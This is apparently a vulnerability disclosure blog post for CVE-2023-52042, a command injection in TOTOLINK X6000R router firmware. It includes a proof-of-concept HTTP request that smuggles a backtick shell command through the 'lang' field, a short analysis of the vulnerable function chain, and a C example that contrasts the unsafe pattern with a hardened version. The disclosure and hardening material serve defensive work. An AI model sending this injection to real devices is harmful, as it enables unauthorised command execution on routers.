CVE-2023-52042

Product:

TOTOLINK X6000R

Version:

V9.4.0cu.852_B20230719

Firmware download address:

https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/247/ids/36.html

Vulnerability Description:

In the sub_410118 function of the shttpd program, the value passed in the request is handed to Uci_Set_Str, which then leads to arbitrary command execution through CsteSystem.

POC

The following request executes the command ls > /1.txt:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.75.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Origin: http://192.168.75.2
Connection: close
Referer: http://192.168.75.2/advance/ddns.html

{"lang":" `ls > /1.txt`","langAutoFlag":"0","topicurl":"setLanguageCfg"}


Effect


Analysis

In the shttpd program, the sub_4117F8 function modifies the ‘lang’ value when the language is changed, and this is where the command execution vulnerability can be exploited.


In Uci_Set_Str, the parameters are concatenated using snprintf and then passed into CsteSystem for execution.


CsteSystem:

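The pattern described in the analysis, shown next to a hardened form, as an added example (not code from the firmware or from the original post). The uci command format, the key name example.main.lang and all function names are assumptions; the second sample value is the lang value from the PoC above.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed config key, for illustration only (not taken from the firmware). */
#define LANG_KEY "example.main.lang"

/* Pattern described in the analysis: the request value is formatted into a
 * command string that a system()-style helper hands to the shell. The format
 * string is an assumption. Shell metacharacters in val survive intact. */
int build_cmd_unsafe(char *out, size_t n, const char *val) {
    return snprintf(out, n, "uci set %s=%s", LANG_KEY, val);
}

/* Allowlist: 1..8 characters from [A-Za-z0-9_-], nothing else. */
int is_safe_lang(const char *s) {
    size_t len = strlen(s);
    if (len == 0 || len > 8)
        return 0;
    for (size_t i = 0; i < len; i++)
        if (!isalnum((unsigned char)s[i]) && s[i] != '_' && s[i] != '-')
            return 0;
    return 1;
}

/* Hardened form: validate first, then build an argv[] for execv()-style
 * execution so no shell ever parses the value. Returns 0 on success. */
int build_argv_safe(const char *val, char *assign, size_t n, const char *argv[4]) {
    if (!is_safe_lang(val))
        return -1;
    int w = snprintf(assign, n, "%s=%s", LANG_KEY, val);
    if (w < 0 || (size_t)w >= n)
        return -1;               /* truncated: refuse rather than run it */
    argv[0] = "uci"; argv[1] = "set"; argv[2] = assign; argv[3] = NULL;
    return 0;
}

int main(void) {
    /* Constructed samples: a plain value and the lang value from the PoC. */
    const char *samples[] = { "cn", " `ls > /1.txt`" };
    char cmd[128], assign[64];
    const char *argv[4];
    for (int i = 0; i < 2; i++) {
        build_cmd_unsafe(cmd, sizeof cmd, samples[i]);
        int rc = build_argv_safe(samples[i], assign, sizeof assign, argv);
        printf("unsafe: [%s]  hardened: %s\n", cmd, rc == 0 ? "accepted" : "rejected");
    }
    return 0;
}
```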


https://kee02p.github.io/2024/01/13/CVE-2023-52042/
Author: Kee02p
Published: January 13, 2024